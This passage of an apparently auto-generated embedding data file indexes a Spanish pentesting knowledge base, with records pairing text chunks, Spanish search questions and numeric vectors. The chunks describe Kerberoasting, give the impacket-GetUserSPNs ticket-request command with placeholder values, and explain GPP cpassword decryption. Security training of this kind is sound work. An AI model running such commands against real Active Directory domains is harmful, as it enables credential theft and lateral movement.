-0.00911, -0.09469, 0.03363, -0.08929, 0.0051, -0.0344, -0.04059, 0.0545, 0.02052, 0.0764, -0.05556, 0.04867, -0.0034, 0.02804, 0.01843, 0.02363, 0.01501, -0.00432, 0.03327, 0.0083, 0.00254, -0.01821, 0.04295, 0.02184, -0.08008, -0.0142, -0.02117, -0.01168, 0.03108, -0.00524, 0.00305, 0.06358, -0.02093, -0.00204, 0.02939, 0.0584, 0.01459, -0.02245, -0.03946, 0.04592, -0.0139, 0.00807, -0.07586, -0.00553, 0.01504, -0.0726, -0.03402, -0.05696, -0.04286, -0.00343, 0.05875, -0.00977, -0.04301, -0.01092, -0.03325, -0.01058, -0.00237, 0.01423, -0.02086, -0.02533, 0.00843, -0.0249, -0.01219, -0.06255, -0.05557, -0.04778, 0.02072, 0.00907, -0.07042, -0.04048, 0.07144, 0.04103, 0.02805, -0.02267, -0.01471, 0.00184, -0.06631, -0.00873, -0.01515, 0.03486, -0.02829, 0.06216, -0.01291, 0.00751, 0.0225, -0.0325, 0.01462, 0.05992, 0.00701, -0.01903, -0.04598, -0.04026, -0.0345, 0.00146, -0.05782, 0.04759, 0.04149, 0.03543, -0.02265, 0.02317, -0.01402]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "que herramienta sirve para obtener los nombres de servicio de usuarios en una red", "v": [0.02424, 0.07882, -0.07844, -0.21357, 0.04055, -0.13284, -0.14511, -0.10473, 0.05505, -0.08089, -0.11077, -0.19123, 0.04146, -0.1826, 0.0973, 0.00376, 0.07835, -0.02879, 0.07946, 0.04599, 0.02208, 0.04531, -0.12859, 0.0437, -0.11986, 0.0528, 0.09149, -0.13272, -0.09795, 0.17792, 0.02309, -0.12147, -0.05788, -0.09947, -0.09578, -0.02649, 0.03999, 0.03384, -0.0137, 0.14853, -0.02582, 0.01277, -0.08113, 0.02684, 0.02593, 0.05246, -0.09853, 0.05697, 0.0083, 0.04153, 0.01064, -0.15797, -0.17603, -0.08966, -0.08776, -0.12587, 0.08973, -0.1104, -0.1504, -0.02302, -0.09986, -0.06866, -0.03404, 0.06161, 0.01859, -0.08743, -0.01555, -0.01357, -0.04853, 0.06128, -0.00455, 0.06615, 0.00909, -0.03372, 0.01479, -0.00698, 0.01206, -0.04586, -0.00452, -0.02795, 0.05691, 0.01644, -0.10238, -0.05517, -0.0814, -0.06097, 0.08804, -0.03542, 0.04138, -0.05191, 0.05547, 0.13196, 0.05619, 0.06631, 0.04381, 0.05104, 0.07464, -0.05894, -0.01723, -0.06099, 0.15977, 0.03106, -0.03658, 0.04939, -0.02654, 0.01502, 0.01725, -0.04016, -0.01809, -0.02497, 0.05963, -0.02473, 0.05057, 0.03624, 0.0173, 0.00383, 0.00539, -0.0875, 0.00135, -0.02778, -0.02701, 0.00959, 0.03074, -0.06544, 0.02067, -0.01631, -0.01593, -0.03051, 0.00586, -0.09112, -0.00205, -0.02117, -0.06238, -0.01886, -0.02486, -0.05833, 0.03374, -0.09624, 0.02497, -0.02954, 0.00311, 0.06088, -0.09762, -0.1142, 0.02883, 0.05479, 0.1079, -0.04971, 0.01048, -0.02416, -0.01091, -0.02053, -0.08445, 0.02755, -0.07021, 0.02065, -0.05026, 0.00786, -0.11729, 0.00956, -0.04039, -0.10328, 0.05468, 0.0093, -0.04848, -0.05258, 0.07674, 0.00892, 0.11124, 0.00553, 0.0169, 0.02206, -0.01752, -0.05156, 0.00042, -0.02693, -0.0719, -0.0256, -0.01503, -0.04351, -0.02235, -0.06582, -0.04951, -0.00209, 0.00906, -0.04746, -0.00123, -0.04203, -0.01058, -0.03223, -0.0437, 0.01124, 0.00249, -0.02169, 0.00571, 0.05027, 0.0173, -0.02466, 0.02624, -0.08558, -0.03589, 0.00166, -0.00321, 0.03281, -0.01276, 0.00134, 0.05418, 0.01525, 0.00773, 0.03673, 0.0088, 0.02672, 0.0188, -0.00303, -0.0355, -0.07984, 0.03197, -0.01411, 0.01841, -0.01939, -0.02094, -0.05979, -0.00067, 0.04607, -0.02701, 0.02838, 0.03246, -0.05817, -0.02443, -0.01519, 0.05658, -0.03595, -0.02362, -0.02698, 0.00106, -0.08289, 0.0493, 0.02993, -0.05331, -0.0246, -0.0367, 0.07824, -0.0083, 0.02337, -0.00455, -0.05143, -0.00074, -0.03279, -0.03385, -0.05538, -0.05105, 0.04075, 0.04805, 0.00052, 0.05054, -0.00731]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "con que puedo extraer los SPN de un usuario especΓ­fico usando sus credenciales", "v": [-0.06625, 0.00658, -0.21905, -0.02887, 0.08122, -0.12865, -0.04449, -0.24717, -0.10109, -0.11189, -0.10227, 0.1037, -0.08167, -0.1843, -0.1474, -0.04044, 0.02377, -0.01985, 0.06405, 0.11889, -0.03932, -0.14538, -0.04584, -0.06351, -0.00386, 0.06473, 0.01909, 0.02022, -0.01447, 0.0215, -0.03672, 0.12445, 0.0099, -0.06238, -0.04164, 0.01649, -0.05982, 0.09187, 0.0084, 0.13981, 0.08963, 0.02912, -0.11672, 0.0249, 0.03954, 0.1269, -0.04047, 0.01482, -0.09652, 0.03164, 0.01161, -0.02766, -0.22782, -0.0532, -0.04505, -0.04624, 0.12514, -0.07492, 0.02424, -0.00165, 0.01021, 0.02588, 0.02976, 0.0251, -0.03434, -0.06423, 0.01735, -0.03736, -0.11272, -0.03778, -0.07764, 0.01971, 0.10584, -0.03857, 0.08552, 0.05575, 0.01928, 0.02012, 0.08223, -0.00811, -0.01551, -0.07912, -0.02258, -0.05676, -0.07417, -0.02187, 0.04771, -0.09432, -0.01366, -0.0376, 0.07556, 0.05992, -0.02301, -0.04081, 0.02568, -0.02303, 0.00036, -0.00405, 0.00867, -0.03462, 0.0869, -0.03024, -0.04494, 0.15828, -0.01844, -0.04612, 0.10664, -0.02315, 0.01051, -0.04917, 0.0565, -0.00738, -0.0675, -0.08165, -0.04735, 0.03997, -0.0866, -0.11489, -0.04317, -0.04786, -0.01551, -0.15718, 0.08134, -0.03585, 0.00563, -0.06991, -0.06067, 0.09901, -0.02818, -0.08038, -0.1128, 0.08199, -0.00676, 0.02857, 0.00268, 0.00345, -0.02071, -0.06178, -0.06249, 0.08104, 0.03266, -0.05574, -0.02435, 0.01957, 0.04865, -0.0379, -0.01191, -0.05989, -0.00197, -0.08204, 0.09436, -0.00605, 0.04329, -0.00463, -0.0747, 0.03982, 0.04342, -0.0657, -0.02049, 0.08695, -0.08111, -0.03145, 0.05554, -0.01694, 0.02068, -0.01526, -0.07682, -0.03766, 0.01183, 0.05229, 0.00678, 0.04479, 0.01118, -0.05686, 0.02539, -0.04035, -0.00191, -0.04296, -0.00075, -0.0395, -0.07987, -0.0233, 0.00022, -0.06024, -0.05699, -0.04137, -0.00466, -0.00897, -0.02, 0.01409, -0.00669, 0.09955, 0.0369, -0.00337, -0.02398, -0.02394, 0.02941, 0.00091, -0.03391, -0.03601, -0.07367, 0.07655, 0.01367, -0.03763, 0.05639, 0.05165, -0.01879, 0.06266, 0.03386, 0.04459, 0.06835, -0.02164, 0.05586, -0.01866, -0.07931, 0.01963, 0.04022, 0.00523, -0.02675, -0.0452, -0.00685, 0.03144, 0.07006, 0.0144, -0.02145, -0.00532, 0.0025, -0.00624, -0.04747, 0.04255, 0.00415, 0.05829, -0.05615, -0.04487, 0.04545, 0.03979, -0.00718, 0.01091, -0.03515, -0.00997, -0.04624, 0.01805, -0.03449, -0.02089, -0.03511, 0.00126, -0.0958, 0.03648, -0.02114, -0.06338, 0.04718, 0.01633, 0.05448, -0.05674, 0.03164, 0.01919]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "cual es una alternativa libre a impacket para obtener informaciΓ³n sobre nombres de servicio", "v": [-0.06261, 0.11423, -0.05578, -0.05181, -0.0115, -0.1512, -0.00648, -0.09688, -0.19864, -0.05155, -0.10371, -0.19669, -0.00354, -0.03372, 0.08025, 0.01897, 0.09953, -0.07362, 0.16529, -0.00223, -0.05033, 0.07096, -0.15984, -0.00979, -0.16125, -0.04371, 0.01682, -0.0065, -0.05772, 0.13414, -0.0002, -0.11727, -0.03722, -0.03964, -0.02037, 0.03111, 0.19051, 0.06872, 0.11948, -0.02369, -0.02575, -0.10866, -0.02976, 0.12631, -0.01179, -0.03268, -0.1728, 0.10883, 0.04403, -0.09364, 0.00875, -0.03958, -0.08632, -0.046, -0.01055, -0.00655, 0.06646, -0.07443, -0.15004, 0.08806, -0.02146, -0.00324, -0.00273, 0.02795, 0.08989, -0.02197, -0.0763, -0.02267, -0.07394, -0.00141, 0.08669, -0.02854, 0.07221, -0.0285, -0.10836, -0.00413, -0.01294, -0.03762, -0.03523, 0.07694, 0.08017, -0.05059, -0.05336, 0.01804, -0.08309, -0.02051, 0.0711, -0.04228, 0.02669, 0.00751, 0.0931, 0.10808, -0.04935, 0.19986, 0.00428, 0.01574, 0.00433, 0.0788, -0.04795, -0.0002, 0.0814, 0.08021, -0.04951, 0.03304, -0.05281, -0.03541, -0.01955, 0.0171, -0.09418, -0.00696, -0.00287, 0.06481, 0.04923, 0.08647, 0.04517, -0.09249, -0.01377, -0.00542, 0.05325, -0.00098, -0.08385, 0.01642, 0.0699, -0.07, 0.0445, 0.03372, 0.07724, -0.04461, 0.00134, 0.00993, 0.05284, -0.0237, -0.06359, -0.11356, 0.01008, -0.09943, 0.07171, -0.01615, 0.06618, -0.00296, 0.01182, 0.0059, -0.0283, 0.02132, -0.00286, -0.0103, 0.05781, -0.02742, 0.02043, -0.02484, -0.04393, 0.0576, -0.03154, 0.14239, -0.04896, -0.01936, -0.07825, -0.07134, -0.07912, 0.04186, 0.00454, -0.07984, -0.03957, 0.02749, -0.03071, -0.0166, 0.06715, -0.02408, -0.01735, 0.0058, -0.0418, 0.04789, 0.01035, -0.04599, 0.00904, -0.04534, -0.07344, -0.06536, 0.02424, -0.03803, -0.03123, 0.00945, -0.08345, 0.01422, 0.01032, -0.0459, 0.03248, -0.03005, -0.03292, -0.02947, -0.03164, 0.01191, -0.05165, -0.08973, -0.06943, 0.02383, 0.05063, -0.06905, 0.03096, -0.02697, -0.06552, -0.01946, -0.03013, 0.0206, -0.06323, -0.03029, 0.02297, 0.02746, -0.01899, 0.04341, 0.04711, 0.01525, 0.09952, -0.01965, -0.09439, -0.03313, 0.00291, -0.03955, 0.01412, 0.0263, -0.02726, -0.01534, 0.01458, 0.02562, -0.00036, 0.00521, 0.09357, 0.0242, -0.03553, -0.00588, 0.02721, 0.04344, -0.02087, -0.01582, 0.02006, 0.00277, 0.02056, 0.04176, -0.01426, -0.00873, 0.02777, 0.1063, -0.02067, 0.02352, -0.01179, 0.01408, -0.05586, 0.01499, -0.07045, -0.06275, -0.04378, 0.06725, -0.00889, 0.03794, 0.08236, -0.00023]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· OSCP MOC", "indexar": "con que puedo hacer un cruceo o movimiento lateral en la red?", "v": [0.02855, 0.0174, -0.17358, -0.0466, -0.16742, -0.04207, -0.05044, 0.17194, 0.01473, -0.11492, -0.05669, -0.1138, 0.00873, 0.0293, 0.14761, -0.04345, -0.00519, 0.17177, -0.00673, -0.05589, -0.0933, -0.19207, 0.00219, -0.03571, 0.10775, 0.00359, -0.05276, -0.04616, -0.02068, -0.02912, -0.10382, 0.13386, 0.05792, 0.02024, 0.09572, -0.09363, 0.01895, 0.06028, 0.0384, 0.03945, -0.12666, -0.0005, -0.04442, 0.00201, -0.06245, -0.10109, 0.03514, 0.00998, -0.10629, -0.00247, 0.11771, -0.04307, -0.15832, -0.19472, -0.05235, 0.02368, 0.11327, 0.00218, -0.01236, -0.08027, 0.15074, 0.03423, -0.03392, 0.01386, -0.00157, -0.03678, -0.02736, -0.01574, -0.04066, 0.0117, 0.05052, 0.04341, -0.10548, 0.04674, -0.05594, 0.12202, 0.01933, 0.01273, 0.03254, -0.03952, 0.03367, 0.10189, -0.0129, -0.01479, 0.00745, -0.13103, -0.02502, -0.00367, 0.05048, 0.04757, 0.18579, 0.03988, 0.00582, 0.0196, 0.02214, 0.06255, -0.19261, -0.03679, -0.07223, -0.00308, 0.06769, 0.05007, -0.13113, -0.06053, 0.06389, -0.01832, 0.05402, 0.01075, 0.06759, -0.01463, 0.07085, -0.02183, 0.04235, -0.05126, 0.0257, 0.05288, -0.10998, 0.01697, -0.03906, 0.04102, 0.05589, -0.0274, -0.08742, -0.0304, -0.01603, -0.05537, -0.0374, 0.0675, -0.07636, -0.03502, 0.01118, 0.02341, -0.01829, -0.15542, -0.11336, 0.01059, 0.01425, -0.0113, 0.0587, -0.06857, 0.06026, 0.02472, -0.02611, -0.0606, 0.0095, 0.08923, 0.03797, -0.04063, -0.03772, 0.05081, -0.06278, 0.03988, -0.0328, 0.00503, 0.04896, 0.04894, -0.0133, -0.00197, -0.07544, 0.07149, -0.03293, 0.06636, -0.05217, -0.01986, -0.00224, 0.01677, -0.04032, 0.06227, -0.00016, -0.0382, -0.06391, 0.03362, -0.03206, -0.00455, 0.07838, -0.02955, -0.04352, -0.03903, 0.02804, -0.04393, 0.01945, 0.03125, -0.03221, -0.01528, 0.07202, -0.01546, 0.01716, -0.03529, 0.06533, 0.08385, -0.01488, -0.00517, 0.02027, 0.00831, 0.00569, 0.01232, 0.02012, -0.0058, 0.02079, -0.00071, -0.07499, 0.00633, 0.00207, -0.01775, 0.01502, 0.06427, -0.0603, 0.11177, 0.0452, 0.06359, 0.01631, -0.03728, 0.09933, -0.01364, -0.08304, -0.0113, 0.01915, -0.04078, 0.01884, -0.00916, 0.09544, 0.05598, 0.00928, 0.0373, 0.00275, -0.0211, 0.01581, -0.00336, -0.04655, 0.04178, 0.04793, 0.05112, -0.0066, -0.04085, 0.03511, 0.05905, 0.06519, 0.02246, -0.02367, -0.03714, 0.03856, 0.01063, -0.05895, 0.01057, 0.05804, -0.04483, -0.04398, 0.03963, 0.03403, -0.04786, 0.00234, 0.0174, 0.0266, -0.00772, 0.06422, 0.02251]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· OSCP MOC", "indexar": "que herramienta sirve para probar si las credenciales robadas funcionan en otros sistemas?", "v": [-0.03707, -0.00403, -0.25018, -0.12205, 0.08431, -0.12038, 0.00633, -0.00131, -0.02681, -0.11045, -0.18454, -0.06787, 0.08927, -0.12663, 0.1178, 0.04505, -0.02296, -0.11441, -0.08642, -0.00099, -0.02774, -0.08027, -0.12238, -0.06502, -0.04608, 0.01318, 0.09307, -0.04146, -0.12916, 0.14733, 0.05722, -0.03552, 0.13939, -0.08476, -0.21231, -0.02543, -0.11998, -0.03528, 0.04048, 0.11326, 0.0495, 0.01586, -0.02819, -0.02716, 0.07656, 0.0498, -0.04887, 0.00596, -0.1426, 0.07338, -0.11422, -0.13564, -0.09432, -0.08199, 0.01263, -0.19525, 0.09146, -0.08395, 0.02118, -0.03827, -0.10826, 0.02733, 0.02791, -0.04687, 0.08142, -0.08485, -0.05218, -0.1083, -0.06618, 0.0046, -0.06793, 0.06458, -0.04052, 0.03992, -0.03075, -0.03777, -0.00064, 0.02435, 0.05612, -0.0294, 0.06629, 0.02731, -0.09414, 0.05225, 0.02746, -0.09725, 0.06109, 0.00324, 0.00391, -0.03692, 0.0103, 0.14076, 0.07364, 0.03555, 0.03586, 0.02156, 0.04689, -0.02586, 0.04671, 0.01667, 0.12085, -0.0853, -0.05588, 0.07175, -0.12083, -0.01326, 0.0343, -0.00082, 0.0277, -0.09994, 0.0135, -0.00394, -0.08206, 0.0007, -0.03494, 0.03983, -0.03684, -0.07911, -0.04582, -0.04113, 0.00408, 0.02369, -0.04435, -0.039, 0.04155, 0.02529, -0.00717, 0.03198, 0.02747, 0.00341, 0.00414, -0.01456, -0.07714, 0.08156, 0.01317, -0.08113, 0.05522, -0.04241, -0.04931, -0.05693, 0.02874, 0.07307, -0.03232, -0.09365, 0.02076, 0.0348, 0.05564, -0.07979, 0.02955, 0.01615, 0.01254, 0.00697, -0.04836, 0.01531, -0.0391, -0.03499, 0.05615, -0.02771, -0.08131, 0.01226, -0.05949, -0.01868, 0.04889, 0.0485, 0.01075, -0.05606, 0.02005, -0.02945, 0.12434, 0.05204, 0.04764, 0.07945, 0.04047, -0.05528, 0.04155, -0.02757, -0.05959, -0.02711, 0.022, -0.04572, -0.01816, 0.06853, -0.01531, -0.03562, 0.02575, -0.02388, -0.00117, -0.01281, -0.0366, 0.05611, 0.05592, 0.00905, 0.01976, -0.02799, 0.04467, 0.05533, 0.01383, -0.06129, 0.0407, 0.01126, -0.07108, 0.01966, -0.0236, -0.07158, 0.02687, 0.06814, -0.00824, -0.00223, 0.00993, 0.04657, 0.03359, -0.00093, 0.03181, -0.05847, -0.03557, -0.03217, 0.01271, 0.02889, -0.0329, -0.01747, 0.03267, -0.00714, 0.03501, 0.05738, -0.00075, 0.0368, 0.00654, -0.00025, 0.02861, -0.02264, 0.02166, -0.03715, -0.01308, -0.00503, 0.00728, -0.05362, 0.03206, -0.02469, -0.06133, -0.11068, -0.03447, 0.06147, -0.01161, -0.0507, -0.03164, -0.04183, -0.03597, -0.03266, -0.00084, -0.06476, -0.04914, 0.01486, 0.03563, -0.03309, 0.04093, 0.01075]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· OSCP MOC", "indexar": "cual programa me ayuda a realizar ataques AS-REP roasting?", "v": [-0.01156, 0.04251, -0.08596, -0.1529, 0.12035, 0.02997, 0.12342, 0.02323, -0.09703, 0.08209, -0.12828, -0.11493, 0.02965, -0.05137, 0.24258, -0.07366, -0.03601, 0.2048, 0.11326, 0.12776, 0.01647, -0.05649, -0.09566, 0.11439, 0.08645, 0.13272, 0.10162, 0.03672, 0.0225, -0.06734, 0.02784, -0.05794, -0.05109, 0.0006, -0.10963, 0.03153, 0.06803, 0.01761, 0.09093, 0.06683, -0.07825, -0.06235, -0.16558, -0.04903, 0.07843, 0.00753, 0.03189, -0.06748, -0.00774, -0.00129, 0.03547, 0.05635, -0.0523, -0.07838, 0.02534, -0.01868, 0.02607, -0.22598, -0.06581, -0.00619, -0.00994, -0.00837, 0.03725, -0.07659, 0.10608, -0.0299, 0.01522, -0.07674, -0.02558, 0.02093, -0.07178, 0.03337, 0.01216, -0.05305, -0.04381, -0.03569, 0.08303, 0.0218, 0.09523, -0.12123, -0.04761, -0.01644, 0.00363, 0.09309, -0.01618, -0.05014, 0.02943, -0.03747, -0.01937, -0.12069, 0.07501, -0.05861, -0.00914, 0.0541, 0.05574, -0.07, 0.0566, -0.01378, -0.01621, -0.00239, 0.02334, -0.11358, -0.10209, 0.0204, -0.00349, 0.054, 0.05254, -0.05875, -0.04946, -0.00927, -0.03782, -0.0085, -0.07584, -0.0958, -0.01698, -0.0476, -0.03058, -0.03642, 0.08424, -0.07915, -0.12654, 0.07437, -0.06054, 0.18746, 0.09824, 0.05474, 0.00846, 0.06973, -0.06491, -0.0209, 0.02576, 0.00495, 0.0345, 0.00699, -0.0305, -0.0597, -0.02381, -0.09411, -0.03442, -0.06671, 0.04456, 0.07008, 0.03133, 0.01863, -0.03649, -0.00915, 0.00564, -0.05967, -0.00057, 0.04035, 0.01142, 0.0187, 0.01742, 0.06087, -0.08219, -0.08112, -0.05271, 0.0012, -0.04821, 0.07052, -0.04489, 0.01947, -0.00784, -0.07374, 0.01413, 0.011, 0.02002, 0.08247, 0.16077, 0.03271, -0.00773, 0.03706, 0.05112, -0.02577, -0.00144, -0.02316, -0.02032, -0.07217, 0.0026, -0.00757, -0.09664, -0.02348, 0.08827, 0.05246, -0.03451, -0.01434, 0.02553, 0.00309, 0.02141, -0.02132, 0.00821, -0.01097, 0.00912, -0.00742, 0.00146, -0.03753, -0.06338, -0.00077, 0.02227, 0.01526, -0.03816, -0.00507, -0.07154, -0.06542, -0.0041, 0.10757, -0.04612, -0.03875, 0.00696, 0.06494, 0.02885, -0.00841, 0.08562, 0.01351, -0.02561, 0.0211, 0.03209, 0.02209, -0.04963, -0.00055, 0.06275, -0.04915, 0.06462, 0.07152, -0.00844, -0.00024, 0.05331, -0.00218, -0.05487, 0.0103, 0.01956, -0.05319, 0.01268, -0.04825, 0.00502, -0.05517, -0.02206, -0.04715, -0.02426, 0.02766, -0.02029, 0.01615, 0.00177, -0.04501, 0.04079, 0.0207, -0.08167, -0.00134, -0.00768, 0.0028, -0.00799, 0.03923, -0.0149, -0.04028, 0.05727, -0.02563]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": "que programa sirve para recuperar contraseΓ±as de GPP cpassword", "v": [0.03993, -0.02448, -0.13788, -0.24148, 0.00054, -0.18922, 0.15481, -0.07975, -0.08299, -0.02506, 0.07718, 0.09656, -0.06549, -0.04202, -0.02576, 0.01081, 0.06422, -0.00157, 0.05017, 0.12431, -0.07944, 0.03495, 0.04398, -0.16153, -0.01868, 0.04297, 0.03158, -0.05645, -0.03707, -0.00712, 0.0125, -0.07807, -0.06644, -0.07233, -0.14512, 0.14156, 0.03401, 0.09619, -0.00406, 0.08956, 0.08118, 0.02297, -0.13267, 0.08483, 0.02697, -0.1027, 0.11234, 0.06593, 0.02466, -0.06589, -0.10739, -0.0363, -0.01353, -0.09008, -0.02691, -0.05179, 0.0252, -0.00131, -0.14715, 0.02078, -0.08939, 0.08503, 0.04261, 0.08151, -0.03468, -0.11487, 0.05609, 0.05684, -0.13495, 0.18233, -0.07005, 0.00027, 0.02963, 0.01982, -0.03009, -0.07144, 0.04615, 0.00853, 0.0553, 0.05992, -0.02387, -0.04774, -0.03734, 0.01418, -0.10925, 0.04165, 0.08291, -0.00557, 0.06012, -0.07936, 0.01301, 0.00354, 0.02326, 0.12304, -0.02175, -0.09898, 0.00229, -0.00701, -0.07257, 0.00566, 0.00347, -0.00947, -0.04701, 0.0752, -0.05359, 0.08256, 0.08365, 0.06544, -0.04134, -0.01259, 0.02693, 0.02569, 0.00753, -0.03131, 0.03771, 0.00827, -0.07062, -0.05166, 0.0532, 0.0269, -0.00512, 0.02953, -0.04926, 0.04674, 0.02507, 0.12817, 0.05018, 0.04487, -0.1008, -0.02043, 0.02212, 0.01179, -0.02217, -0.03199, -0.09022, 0.00369, 0.03776, -0.03398, -0.06978, -0.0293, 0.03123, 0.0618, 0.02667, 0.05752, 0.02779, 0.08595, 0.12843, -0.05299, -0.01448, 0.00879, 0.04254, 0.01058, 0.00771, 0.03084, -0.08659, -6e-05, -0.01669, -0.05858, -0.09716, 0.11721, -0.0902, -0.03185, -0.07179, 0.03451, -0.00622, -0.00603, 0.03361, 0.06556, 0.10777, 0.03906, -0.01126, 0.00904, 0.08134, -0.07932, -0.01172, 0.01832, 0.05374, -0.09529, 0.07674, -0.14827, -0.03829, 0.01517, 0.03864, 0.03029, 0.00309, -0.11613, 0.04418, 0.01935, -0.00584, -0.03151, 0.01092, -0.05245, -0.02401, -0.00221, -0.02242, 0.01759, -0.0739, 0.0058, 0.02679, -0.05962, 0.00543, 0.0132, -0.0285, -0.0008, 0.06173, 0.00445, 0.0008, -0.01577, -0.02289, 0.05534, -0.00575, -0.04082, 0.00354, -0.03491, -0.05153, -0.08184, -0.05474, 0.04752, -0.04338, 0.00762, 0.01363, -0.00299, 0.01165, 0.09122, 0.00443, -0.12156, -0.0053, 0.00131, 0.02526, -0.01893, 0.00185, 0.02, -0.03782, 0.00642, 0.04093, -0.0426, -0.07598, -0.04791, 0.00596, -0.02702, -0.04178, 0.03095, -0.00236, -0.03299, -0.04165, 0.03281, 0.03253, 0.0041, 0.03152, 0.06513, -0.09029, 0.02596, 0.01406, -0.00768, -0.02334, -0.00703]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": "como puedo desbloquear un cifrado con clave AES pΓΊblica fija", "v": [0.09765, 0.01019, -0.14952, 0.02214, 0.15604, -0.00514, -0.02115, -0.03447, -0.23807, -0.09798, 0.00017, -0.04727, -0.13949, -0.01401, 0.18156, -0.12867, -0.03759, -0.09307, -0.00817, -0.00858, 0.06444, -0.17044, -0.06075, -0.03446, -0.04585, -0.05178, -0.01178, 0.10435, -0.14974, -0.09682, 8e-05, -0.04305, 0.1188, 0.06704, 0.11916, 0.11142, -0.00327, 0.05003, 0.00259, -0.01575, 0.03397, -0.06217, -0.03088, -0.03746, -0.02972, -0.00267, 0.04619, 0.072, 0.00699, -0.03889, -0.08044, -0.11681, -0.07164, -0.11386, -0.10584, 0.00515, 0.13421, 0.11817, -0.17339, 0.01673, -0.13226, -0.04991, 0.02805, -0.02395, 0.0303, -0.10844, 0.06201, 0.0877, 0.00653, 0.02861, 0.01297, 0.04384, -0.09238, 0.0533, -3e-05, 0.02154, -0.06023, -0.10615, 0.0979, 0.08694, 0.0062, -0.08803, 0.05236, 0.04302, -0.03062, 0.05125, 0.03317, 0.07213, 0.00101, 0.0127, 0.02356, 0.04963, 0.04777, 0.05337, -0.04009, 0.07134, 0.02872, 0.14555, -0.00067, -0.05463, 0.05957, -0.00189, -0.06259, 0.0232, 0.05662, 0.03565, 0.02938, -0.0819, 0.07476, 0.03792, 0.0275, -0.01802, -0.04612, -0.07278, -0.12544, 0.04808, 0.03729, -0.03356, -0.00968, -0.05151, -0.0722, -0.0112, 0.02918, -0.06475, 0.03973, 0.07928, -0.06577, -0.00421, 0.0306, -0.0276, -0.03071, 0.1174, -0.0106, 0.0699, -0.02783, 0.04015, -0.01343, -0.07713, -0.00026, 0.04737, 0.08884, -0.00157, -0.00484, -0.03277, 0.0565, -0.05965, 0.03003, -0.04793, -0.1187, 0.0018, 0.06979, 0.02155, 0.01222, 0.06618, -0.02223, 0.02442, -0.032, -0.01625, 0.01405, 0.10191, 0.01551, -0.06135, -0.09658, 0.02586, 0.00399, 0.01197, -0.05096, -0.1248, 0.09126, -0.02658, -0.01605, -0.01315, -0.00819, -0.04075, 0.01448, -0.07467, -0.03612, -0.0232, -0.088, -0.04371, -0.06942, 0.05459, -0.06006, -0.03511, -0.01215, -0.02139, 0.00562, -0.08154, -0.04121, 0.02798, 0.01881, -0.00762, -0.01009, 0.02658, -0.00077, -0.04173, -0.04368, 0.03187, 0.01845, 0.00638, -0.04268, -0.01838, 0.01033, -0.04875, -0.01515, -0.01986, -0.0697, 0.02716, -0.02187, 0.05971, 0.08212, -0.07338, 0.06594, -0.01958, -0.028, 0.01035, -0.03724, -0.03359, 0.00804, 0.03023, 0.03345, 0.12056, 0.05511, 0.006, 0.01153, 0.03048, -0.01168, 0.02153, 0.06649, 0.08203, -0.03162, 0.02068, 0.01842, 0.05001, 0.03648, 0.05773, -0.03639, -0.04698, -0.05227, 0.03225, 0.0252, 0.05894, -0.07148, -0.02828, 0.00836, -0.06175, -0.05615, 0.01445, 0.03155, -0.05389, -0.01346, 0.04756, 0.06561, 0.02981, 0.0374, -0.03735]} +{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# GPP cpassword\n\n> Group Policy Preferences que guardaban contraseΓ±as cifradas con una **clave AES pΓΊblica y fija** (Microsoft la publicΓ³). Trivial de descifrar. Uno de los 7 caminos de Active Directory.", "indexar": 